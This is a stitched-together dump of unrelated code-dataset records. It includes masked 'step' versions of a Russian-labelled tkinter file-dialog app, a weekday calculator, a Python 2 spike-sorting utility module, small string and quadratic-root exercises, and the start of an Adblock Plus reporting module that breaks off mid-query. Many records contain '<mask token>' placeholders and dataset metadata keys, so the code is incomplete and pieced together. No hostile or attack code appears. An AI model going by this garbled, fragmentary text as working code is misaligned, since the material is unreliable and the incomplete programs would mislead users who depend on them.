info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n <mask token>\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n\n def show_info(self):\n mb.showinfo('Информация', 'Лучшее графическое приложение на свете')\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n\n def run(self):\n self.draw_widgets()\n self.root.mainloop()\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n\n def show_info(self):\n mb.showinfo('Информация', 'Лучшее графическое приложение на свете')\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\nif __name__ == '__main__':\n window = Window(500, 500, 'TKINTER')\n window.run()\n", "step-5": "from tkinter import *\nfrom tkinter import messagebox as mb\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import filedialog as fd\nfrom child_window import ChildWindow\n# from PIL import Image as PilImage\n# from PIL import ImageTk, ImageOps\n\n\nclass Window:\n def __init__(self, width, height, title=\"MyWindow\", resizable=(False, False), icon=r\"resources/feather.ico\"):\n self.root = Tk()\n self.root.title(title)\n # self.root.geometry(f\"{width}x{height}+200+200\")\n self.root.geometry(\"+600+300\")\n # self.root.resizable(resizable[0], resizable[1])\n if icon:\n self.root.iconbitmap(icon)\n\n self.text = ScrolledText(self.root)\n\n def run(self):\n self.draw_widgets()\n self.root.mainloop()\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label=\"Открыть\", command=self.open_file)\n file_menu.add_command(label=\"Сохранить как\", command=self.save_file)\n file_menu.add_command(label=\"Отркыть папку\", command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label=\"Выйти\", command=self.exit)\n\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label=\"О приложении\", command=self.show_info)\n\n menu_bar.add_cascade(label=\"Файл\", menu=file_menu)\n menu_bar.add_cascade(label=\"Справка\", menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n # wanted_files = (\n # (\"IMAGES\", \"*.jpeg;*.png;*.gif\"),\n # (\"TEXT files\", \"*.txt;*.log\"),\n # (\"PY files\", \"*.py\"),\n # (\"ALL\", \"*.*\")\n # )\n #\n # file_name = fd.askopenfilename(initialdir=\"D:/\", title=\"FIND A FILE\", filetypes=wanted_files)\n # self.text.insert(END, f\"Надо открыть файл: {file_name}\\nСодержимое:\\n\")\n # if file_name:\n # with open(file_name, \"r\") as f:\n # self.text.insert(END, f.read())\n\n # file = fd.askopenfile()\n # self.text.insert(END, file.read())\n # file.close()\n\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=((\"TEXT files\", \"*.txt\"), (\"Py files\", \"*.py\")))\n if name:\n self.text.insert(END, f\"Сохранить файл по пути {name}\\n\")\n # with open(name, \"w\") as f:\n # f.write(\"123\")\n\n # file = fd.asksaveasfile()\n # file.write(\"123\")\n # file.close()\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f\"Папка {path}\\n\")\n\n def show_info(self):\n mb.showinfo(\"Информация\", \"Лучшее графическое приложение на свете\")\n\n def exit(self):\n choice = mb.askyesno(\"Quit\", \"Do you want to quit?\")\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title=\"Child\", resizable=(False, False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\nif __name__ == \"__main__\":\n window = Window(500, 500, \"TKINTER\")\n # window.create_child(200, 100)\n window.run()\n\n", "step-ids": [ 8, 9, 10, 12, 14 ] }
[ 8, 9, 10, 12, 14 ]
weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'] i = input('Enter a day of the week and number of days: ').split() e = int(i[-1]) starting_point = weekdays.index(i[0]) a = e + starting_point - len(weekdays) print(weekdays[a])
normal
{ "blob_id": "5f7d05c642339ce0ab02a65ca41f9ee89c2faf57", "index": 4240, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(weekdays[a])\n", "step-3": "weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',\n 'Saturday', 'Sunday']\ni = input('Enter a day of the week and number of days: ').split()\ne = int(i[-1])\nstarting_point = weekdays.index(i[0])\na = e + starting_point - len(weekdays)\nprint(weekdays[a])\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import numpy as np import os # ---------------------------------------------------------------------------- # Common variables # shifting channels based on rules: # CH_SHIFT[rule_name] = {src_1_based_ch:new_1_based_ch} CH_SHIFT = {} CH_SHIFT[None] = None # for 1-to-1 cards CH_SHIFT['1to1'] = {} for ch1 in xrange(1, 49): CH_SHIFT['1to1'][ch1] = ch1 for ch1 in xrange(81, 129): CH_SHIFT['1to1'][ch1] = ch1 - 32 # for 20110720A: assign all 40 A channels to 1-40 # and all 70 M channels to 41-110 CH_SHIFT['20110720A'] = {1: 41, 2: 42, 3: 43, 4: 44, 5: 45, 6: 46, 7: 47, 8: 48, 9: 49, 10: 50, 11: 51, 12: 52, 13: 53, 14: 54, 15: 55, 16: 56, 17: 57, 18: 58, 19: 59, 20: 60, 21: 61, 22: 62, 23: 63, 24: 64, 25: 65, 26: 66, 27: 67, 28: 68, 29: 69, 30: 70, 31: 71, 32: 72, 33: 73, 34: 74, 35: 75, 44: 1, 45: 2, 46: 3, 47: 4, 48: 5, 49: 6, 50: 7, 51: 8, 52: 9, 53: 10, 54: 11, 55: 12, 56: 13, 57: 14, 58: 15, 59: 16, 60: 17, 61: 18, 62: 19, 63: 20, 64: 21, 65: 22, 66: 23, 67: 24, 68: 25, 69: 26, 70: 27, 71: 28, 72: 29, 73: 30, 74: 31, 75: 32, 76: 33, 77: 34, 78: 35, 79: 36, 80: 37, 81: 38, 82: 39, 83: 40, 94: 76, 95: 77, 96: 78, 97: 79, 98: 80, 99: 81, 100: 82, 101: 83, 102: 84, 103: 85, 104: 86, 105: 87, 106: 88, 107: 89, 108: 90, 109: 91, 110: 92, 111: 93, 112: 94, 113: 95, 114: 96, 115: 97, 116: 98, 117: 99, 118: 100, 119: 101, 120: 102, 121: 103, 122: 104, 123: 105, 124: 106, 125: 107, 126: 108, 127: 109, 128: 110} # ---------------------------------------------------------------------------- # Common functions def seq_search(iterable, target): """do sequential search""" for i, e in enumerate(iterable): if e != target: continue return i return None def sort_uniq(base, *args): """sort and remove duplicates based on `base` and apply on to `args`""" if len(args) == 0: return None res = [] # sort si = np.argsort(base) base = np.array(base[si]) for arg in args: res.append(np.array(arg[si])) # remove duplicates di = np.nonzero(np.diff(base) == 0)[0] si = list(set(range(len(base))) - set(list(di))) for i in xrange(len(res)): res[i] = np.array(res[i][si]) return res # ----------------------------------------------------------------------------- def parse_opts(opts0): """Parse the options in the command line. This somewhat archaic function mainly exists for backward-compatability.""" opts = {} # parse the stuff in "opts" for opt in opts0: parsed = opt.split('=') key = parsed[0].strip() if len(parsed) > 1: # OLD: cmd = parsed[1].strip() cmd = '='.join(parsed[1:]).strip() else: cmd = '' opts[key] = cmd return opts def parse_opts2(tokens, optpx='--', argparam=False): """A newer option parser. (from perf102)""" opts0 = [] args = [] n = len(optpx) for token in tokens: if token[:2] == optpx: opts0.append(token[n:]) else: if argparam: token = token.split('=') args.append(token) opts = parse_opts(opts0) return args, opts def parse_opts_adapter(tokens, delim, optpx='--', argparam=False): """Adapter to support both old- and new-style options""" if any([t.startswith(optpx) for t in tokens]): # new style args, opts = parse_opts2(tokens, optpx=optpx, argparam=argparam) else: # old style args = tokens[:delim] opts = parse_opts(tokens[delim:]) return args, opts def makeavail(sth, sth2idx, idx2sth, query=None): if sth not in sth2idx: if query is not None and not query(sth): return sth2idx[sth] = len(idx2sth) idx2sth.append(sth) def prep_files(flist, sep=',', extchk=True): flist = flist.split(sep) if flist[0][0] == '+': flist = [f.strip() for f in open(flist[0][1:]).readlines()] if extchk: assert all([os.path.exists(f) for f in flist]) return flist def prepare_save_dir(sav_dir): if sav_dir != '' and not os.path.exists(sav_dir): try: os.makedirs(sav_dir) # in massively-parallel env, it is possible that # the sav_dir is created after os.path.exists() check. # We just ignore if makedirs fails. except Exception: pass def detect_cpus(): # Linux, Unix and MacOS: if hasattr(os, "sysconf"): if 'SC_NPROCESSORS_ONLN' in os.sysconf_names: # Linux & Unix: ncpus = os.sysconf("SC_NPROCESSORS_ONLN") if isinstance(ncpus, int) and ncpus > 0: return ncpus else: # OSX: return int(os.popen2("sysctl -n hw.ncpu")[1].read()) # Windows: if 'NUMBER_OF_PROCESSORS' in os.environ: ncpus = int(os.environ["NUMBER_OF_PROCESSORS"]) if ncpus > 0: return ncpus return 1 # ----------------------------------------------------------------------------- # Peri-stimulus data extraction related N_PRE_PT = 11 SEARCH_RNG = [6, 16] T_REJECT = 10 N_REJECT = 50 def invalidate_artifacts(buf0, t_reject=T_REJECT, n_reject=N_REJECT, verbose=True): """If there are more than `N_REJET` spikes within `T_REJECT`us window, invalidate all of them. """ ti_all = [(b['timestamp'], i) for i, b in enumerate(buf0)] ti_all = sorted(ti_all) t_all = np.array([t[0] for t in ti_all]) i_all = [t[1] for t in ti_all] nb = len(buf0) ri = range(nb) i = 0 while i < nb - 1: ii = [] t0 = t_all[i] for j in xrange(i + 1, nb): if t_all[j] < t0 + t_reject: ii.append(j) else: break i = j if len(ii) < n_reject: continue for ix in ii: try: ri.remove(i_all[ix]) except ValueError: pass buf = [buf0[i] for i in ri] if verbose and len(buf) != nb: print '* Rejecting', nb - len(buf), 'spikes.' return buf def set_new_threshold(wavform, thr, n_pre=N_PRE_PT, rng=SEARCH_RNG, i_chg=20): """Set new threshold `thr`. If the `waveform` cannot pass `thr` returns None. The new waveform is re-aligned based on the steepest point. The returned new waveform has `n_pre` points before the alignment point. """ wav = np.array(wavform) sgn = np.sign(thr) if np.max(wav[rng[0]:rng[1]] * sgn) < np.abs(thr): return None # reject """ NOT USED -- GIVES IMPRECISE RESULT # -- align: find the steepest point having the same sign as `sgn` df = np.diff(wav) si = np.argsort(-sgn * df) # reverse sorted for i in si: if np.sign(wav[i]) == sgn: break """ # -- align: find the point where waveform crosses `thr` n = len(wav) for i in range(n - 1): if sgn * wav[i] <= sgn * thr and sgn * thr <= sgn * wav[i + 1]: break if i == n - 2: # although i could be n - 2, it's highly likely an artifact return None n_shift = n_pre - i - 1 # > 0: right shift, < 0: left shift if n_shift == 0: return wav wavnew = np.empty(wav.shape) wavnew[n_shift:] = wav[:-n_shift] # PBC shifting wavnew[:n_shift] = wav[-n_shift:] # -- done: but if the spike doesn't change its sign # within `i_chg`, reject. if np.max(-sgn * wavnew[n_pre:i_chg]) < 0: return None """ DEBUG if np.abs(n_shift) > 3: print '!!!', n_shift, '/', i, '/', n print '---', np.max(-sgn * wavnew[n_pre:i_chg]) print list(wav) print list(wavnew) """ return wavnew def set_new_threshold_rng(wav, thr, rng=(11, 13), i_chg=32): return set_new_threshold(wav, thr, rng=rng, i_chg=i_chg) # return set_new_threshold(wav, thr) # ----------------------------------------------------------------------------- # Math codes DEFAULT_N_PCA = 3 def fastnorm(x): # fastnorm: from Nicolas' code xv = x.ravel() return np.dot(xv, xv) ** 0.5 # fastsvd: from Nicolas' code def fastsvd(M): h, w = M.shape # -- thin matrix if h >= w: # subspace of M'M U, S, V = np.linalg.svd(np.dot(M.T, M)) U = np.dot(M, V.T) # normalize for i in xrange(w): S[i] = fastnorm(U[:, i]) U[:, i] = U[:, i] / S[i] # -- fat matrix else: # subspace of MM' U, S, V = np.linalg.svd(np.dot(M, M.T)) V = np.dot(U.T, M) # normalize for i in xrange(h): S[i] = fastnorm(V[i]) V[i, :] = V[i] / S[i] return U, S, V def pca_eigvec(M, pca_threshold=DEFAULT_N_PCA): U, S, V = fastsvd(M) eigvectors = V.T eigvectors = eigvectors[:, :pca_threshold] # this gives PCA: # M = np.dot(M, eigvectors) return eigvectors
normal
{ "blob_id": "c2ee716b72652035502a1f07dfe8aa68a104b2bb", "index": 8255, "step-1": "import numpy as np\nimport os\n\n# ----------------------------------------------------------------------------\n# Common variables\n\n# shifting channels based on rules:\n# CH_SHIFT[rule_name] = {src_1_based_ch:new_1_based_ch}\nCH_SHIFT = {}\nCH_SHIFT[None] = None\n# for 1-to-1 cards\nCH_SHIFT['1to1'] = {}\nfor ch1 in xrange(1, 49):\n CH_SHIFT['1to1'][ch1] = ch1\nfor ch1 in xrange(81, 129):\n CH_SHIFT['1to1'][ch1] = ch1 - 32\n\n# for 20110720A: assign all 40 A channels to 1-40\n# and all 70 M channels to 41-110\nCH_SHIFT['20110720A'] = {1: 41, 2: 42, 3: 43, 4: 44, 5: 45, 6: 46,\n 7: 47, 8: 48, 9: 49, 10: 50, 11: 51, 12: 52, 13: 53, 14: 54,\n 15: 55, 16: 56, 17: 57, 18: 58, 19: 59, 20: 60, 21: 61,\n 22: 62, 23: 63, 24: 64, 25: 65, 26: 66, 27: 67, 28: 68,\n 29: 69, 30: 70, 31: 71, 32: 72, 33: 73, 34: 74, 35: 75,\n 44: 1, 45: 2, 46: 3, 47: 4, 48: 5, 49: 6, 50: 7, 51: 8,\n 52: 9, 53: 10, 54: 11, 55: 12, 56: 13, 57: 14, 58: 15,\n 59: 16, 60: 17, 61: 18, 62: 19, 63: 20, 64: 21, 65: 22,\n 66: 23, 67: 24, 68: 25, 69: 26, 70: 27, 71: 28, 72: 29,\n 73: 30, 74: 31, 75: 32, 76: 33, 77: 34, 78: 35, 79: 36,\n 80: 37, 81: 38, 82: 39, 83: 40, 94: 76, 95: 77, 96: 78,\n 97: 79, 98: 80, 99: 81, 100: 82, 101: 83, 102: 84, 103: 85,\n 104: 86, 105: 87, 106: 88, 107: 89, 108: 90, 109: 91,\n 110: 92, 111: 93, 112: 94, 113: 95, 114: 96, 115: 97,\n 116: 98, 117: 99, 118: 100, 119: 101, 120: 102, 121: 103,\n 122: 104, 123: 105, 124: 106, 125: 107, 126: 108,\n 127: 109, 128: 110}\n\n\n# ----------------------------------------------------------------------------\n# Common functions\ndef seq_search(iterable, target):\n \"\"\"do sequential search\"\"\"\n for i, e in enumerate(iterable):\n if e != target:\n continue\n return i\n return None\n\n\ndef sort_uniq(base, *args):\n \"\"\"sort and remove duplicates based on `base` and apply on to `args`\"\"\"\n if len(args) == 0:\n return None\n res = []\n # sort\n si = np.argsort(base)\n base = np.array(base[si])\n for arg in args:\n res.append(np.array(arg[si]))\n # remove duplicates\n di = np.nonzero(np.diff(base) == 0)[0]\n si = list(set(range(len(base))) - set(list(di)))\n for i in xrange(len(res)):\n res[i] = np.array(res[i][si])\n return res\n\n\n# -----------------------------------------------------------------------------\ndef parse_opts(opts0):\n \"\"\"Parse the options in the command line. This somewhat\n archaic function mainly exists for backward-compatability.\"\"\"\n opts = {}\n # parse the stuff in \"opts\"\n for opt in opts0:\n parsed = opt.split('=')\n key = parsed[0].strip()\n if len(parsed) > 1:\n # OLD: cmd = parsed[1].strip()\n cmd = '='.join(parsed[1:]).strip()\n else:\n cmd = ''\n opts[key] = cmd\n\n return opts\n\n\ndef parse_opts2(tokens, optpx='--', argparam=False):\n \"\"\"A newer option parser. (from perf102)\"\"\"\n opts0 = []\n args = []\n n = len(optpx)\n\n for token in tokens:\n if token[:2] == optpx:\n opts0.append(token[n:])\n else:\n if argparam:\n token = token.split('=')\n args.append(token)\n\n opts = parse_opts(opts0)\n\n return args, opts\n\n\ndef parse_opts_adapter(tokens, delim, optpx='--', argparam=False):\n \"\"\"Adapter to support both old- and new-style options\"\"\"\n if any([t.startswith(optpx) for t in tokens]):\n # new style\n args, opts = parse_opts2(tokens, optpx=optpx, argparam=argparam)\n else:\n # old style\n args = tokens[:delim]\n opts = parse_opts(tokens[delim:])\n return args, opts\n\n\ndef makeavail(sth, sth2idx, idx2sth, query=None):\n if sth not in sth2idx:\n if query is not None and not query(sth):\n return\n sth2idx[sth] = len(idx2sth)\n idx2sth.append(sth)\n\n\ndef prep_files(flist, sep=',', extchk=True):\n flist = flist.split(sep)\n if flist[0][0] == '+':\n flist = [f.strip() for f in open(flist[0][1:]).readlines()]\n if extchk:\n assert all([os.path.exists(f) for f in flist])\n\n return flist\n\n\ndef prepare_save_dir(sav_dir):\n if sav_dir != '' and not os.path.exists(sav_dir):\n try:\n os.makedirs(sav_dir)\n # in massively-parallel env, it is possible that\n # the sav_dir is created after os.path.exists() check.\n # We just ignore if makedirs fails.\n except Exception:\n pass\n\n\ndef detect_cpus():\n # Linux, Unix and MacOS:\n if hasattr(os, \"sysconf\"):\n if 'SC_NPROCESSORS_ONLN' in os.sysconf_names:\n # Linux & Unix:\n ncpus = os.sysconf(\"SC_NPROCESSORS_ONLN\")\n if isinstance(ncpus, int) and ncpus > 0:\n return ncpus\n else: # OSX:\n return int(os.popen2(\"sysctl -n hw.ncpu\")[1].read())\n # Windows:\n if 'NUMBER_OF_PROCESSORS' in os.environ:\n ncpus = int(os.environ[\"NUMBER_OF_PROCESSORS\"])\n if ncpus > 0:\n return ncpus\n return 1\n\n\n# -----------------------------------------------------------------------------\n# Peri-stimulus data extraction related\nN_PRE_PT = 11\nSEARCH_RNG = [6, 16]\nT_REJECT = 10\nN_REJECT = 50\n\n\ndef invalidate_artifacts(buf0, t_reject=T_REJECT,\n n_reject=N_REJECT, verbose=True):\n \"\"\"If there are more than `N_REJET` spikes within `T_REJECT`us window,\n invalidate all of them.\n \"\"\"\n ti_all = [(b['timestamp'], i) for i, b in enumerate(buf0)]\n ti_all = sorted(ti_all)\n t_all = np.array([t[0] for t in ti_all])\n i_all = [t[1] for t in ti_all]\n\n nb = len(buf0)\n ri = range(nb)\n i = 0\n while i < nb - 1:\n ii = []\n t0 = t_all[i]\n for j in xrange(i + 1, nb):\n if t_all[j] < t0 + t_reject:\n ii.append(j)\n else:\n break\n i = j\n\n if len(ii) < n_reject:\n continue\n for ix in ii:\n try:\n ri.remove(i_all[ix])\n except ValueError:\n pass\n\n buf = [buf0[i] for i in ri]\n if verbose and len(buf) != nb:\n print '* Rejecting', nb - len(buf), 'spikes.'\n return buf\n\n\ndef set_new_threshold(wavform, thr, n_pre=N_PRE_PT, rng=SEARCH_RNG, i_chg=20):\n \"\"\"Set new threshold `thr`.\n If the `waveform` cannot pass `thr` returns None.\n The new waveform is re-aligned based on the steepest point.\n The returned new waveform has `n_pre` points before the alignment point.\n \"\"\"\n wav = np.array(wavform)\n sgn = np.sign(thr)\n if np.max(wav[rng[0]:rng[1]] * sgn) < np.abs(thr): return None # reject\n\n \"\"\" NOT USED -- GIVES IMPRECISE RESULT\n # -- align: find the steepest point having the same sign as `sgn`\n df = np.diff(wav)\n si = np.argsort(-sgn * df) # reverse sorted\n for i in si:\n if np.sign(wav[i]) == sgn: break\n \"\"\"\n # -- align: find the point where waveform crosses `thr`\n n = len(wav)\n for i in range(n - 1):\n if sgn * wav[i] <= sgn * thr and sgn * thr <= sgn * wav[i + 1]:\n break\n if i == n - 2:\n # although i could be n - 2, it's highly likely an artifact\n return None\n n_shift = n_pre - i - 1 # > 0: right shift, < 0: left shift\n if n_shift == 0:\n return wav\n\n wavnew = np.empty(wav.shape)\n wavnew[n_shift:] = wav[:-n_shift] # PBC shifting\n wavnew[:n_shift] = wav[-n_shift:]\n\n # -- done: but if the spike doesn't change its sign\n # within `i_chg`, reject.\n if np.max(-sgn * wavnew[n_pre:i_chg]) < 0:\n return None\n\n \"\"\" DEBUG\n if np.abs(n_shift) > 3:\n print '!!!', n_shift, '/', i, '/', n\n print '---', np.max(-sgn * wavnew[n_pre:i_chg])\n print list(wav)\n print list(wavnew)\n \"\"\"\n\n return wavnew\n\n\ndef set_new_threshold_rng(wav, thr, rng=(11, 13), i_chg=32):\n return set_new_threshold(wav, thr, rng=rng, i_chg=i_chg)\n # return set_new_threshold(wav, thr)\n\n\n# -----------------------------------------------------------------------------\n# Math codes\nDEFAULT_N_PCA = 3\n\n\ndef fastnorm(x):\n # fastnorm: from Nicolas' code\n xv = x.ravel()\n return np.dot(xv, xv) ** 0.5\n\n\n# fastsvd: from Nicolas' code\ndef fastsvd(M):\n h, w = M.shape\n # -- thin matrix\n if h >= w:\n # subspace of M'M\n U, S, V = np.linalg.svd(np.dot(M.T, M))\n U = np.dot(M, V.T)\n # normalize\n for i in xrange(w):\n S[i] = fastnorm(U[:, i])\n U[:, i] = U[:, i] / S[i]\n # -- fat matrix\n else:\n # subspace of MM'\n U, S, V = np.linalg.svd(np.dot(M, M.T))\n V = np.dot(U.T, M)\n # normalize\n for i in xrange(h):\n S[i] = fastnorm(V[i])\n V[i, :] = V[i] / S[i]\n return U, S, V\n\n\ndef pca_eigvec(M, pca_threshold=DEFAULT_N_PCA):\n U, S, V = fastsvd(M)\n eigvectors = V.T\n eigvectors = eigvectors[:, :pca_threshold]\n # this gives PCA:\n # M = np.dot(M, eigvectors)\n return eigvectors\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import sys ''' Given a string, does the string contain an equal number of uppercase and lowercase letters? Ignore whitespace, numbers, and punctuation. Return the string “true” if balanced or the string “false” if not balanced. ''' for line in sys.stdin: lower = 0 upper = 0 # Count number of lowercase and uppercase letters for x in range(0, len(line)): if 'a' <= line[x] <= 'z': lower = lower + 1 elif 'A' <= line[x] <= 'Z': upper = upper + 1 # Determine if balanced or not if lower == upper: print('true') else: print('false') # Repeat for each input line
normal
{ "blob_id": "4b3664153940b064b424bd77de473a6409437f88", "index": 3279, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n", "step-3": "import sys\n<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n", "step-4": "import sys\n\n'''\nGiven a string, does the string contain an equal number of uppercase and \nlowercase letters? Ignore whitespace, numbers, and punctuation. Return the \nstring “true” if balanced or the string “false” if not balanced.\n'''\nfor line in sys.stdin:\n lower = 0\n upper = 0\n\n # Count number of lowercase and uppercase letters\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n\n # Determine if balanced or not\n if lower == upper:\n print('true')\n else:\n print('false')\n\n # Repeat for each input line\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
def checkRaiz(): a = int(input("Informe o primeiro coeficiente: ")) b = int(input("Informe o segundo coeficiente: ")) c = int(input("Informe o terceiro coeficiente: ")) delta = (b*b) - (4*a*c) if (delta < 0): print("Não tem raiz real") elif (delta == 0): print("Existe uma raiz real") else: print("Existem duas raizes reais") checkRaiz()
normal
{ "blob_id": "603a73a7cc0487fcabb527ebc21d44cb95817ecb", "index": 5909, "step-1": "<mask token>\n", "step-2": "def checkRaiz():\n a = int(input('Informe o primeiro coeficiente: '))\n b = int(input('Informe o segundo coeficiente: '))\n c = int(input('Informe o terceiro coeficiente: '))\n delta = b * b - 4 * a * c\n if delta < 0:\n print('Não tem raiz real')\n elif delta == 0:\n print('Existe uma raiz real')\n else:\n print('Existem duas raizes reais')\n\n\n<mask token>\n", "step-3": "def checkRaiz():\n a = int(input('Informe o primeiro coeficiente: '))\n b = int(input('Informe o segundo coeficiente: '))\n c = int(input('Informe o terceiro coeficiente: '))\n delta = b * b - 4 * a * c\n if delta < 0:\n print('Não tem raiz real')\n elif delta == 0:\n print('Existe uma raiz real')\n else:\n print('Existem duas raizes reais')\n\n\ncheckRaiz()\n", "step-4": "\ndef checkRaiz():\n a = int(input(\"Informe o primeiro coeficiente: \"))\n b = int(input(\"Informe o segundo coeficiente: \"))\n c = int(input(\"Informe o terceiro coeficiente: \"))\n\n delta = (b*b) - (4*a*c)\n\n if (delta < 0):\n print(\"Não tem raiz real\")\n elif (delta == 0):\n print(\"Existe uma raiz real\")\n else:\n print(\"Existem duas raizes reais\")\n\ncheckRaiz()", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# This file is part of the Adblock Plus web scripts, # Copyright (C) 2006-present eyeo GmbH # # Adblock Plus is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # Adblock Plus is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>. import hashlib import hmac import base64 import MySQLdb import os import re import marshal import subprocess from sitescripts.utils import get_config, cached, get_template, anonymizeMail, sendMail def getReportSubscriptions(guid): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT url, hasmatches FROM #PFX#sublists INNER JOIN #PFX#subscriptions ON (#PFX#sublists.list = #PFX#subscriptions.id) WHERE report = %s''', guid) rows = cursor.fetchall() cursor.close() return rows def getReports(startTime): count = 10000 offset = 0 while True: cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact, comment, hasscreenshot, knownissues FROM #PFX#reports WHERE ctime >= FROM_UNIXTIME(%s) LIMIT %s OFFSET %s''', (startTime, count, offset)) rows = cursor.fetchall() cursor.close() if len(rows) == 0: break for row in rows: yield row offset += len(rows) def getReportsForUser(contact): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT guid, type, UNIX_TIMESTAMP(ctime) 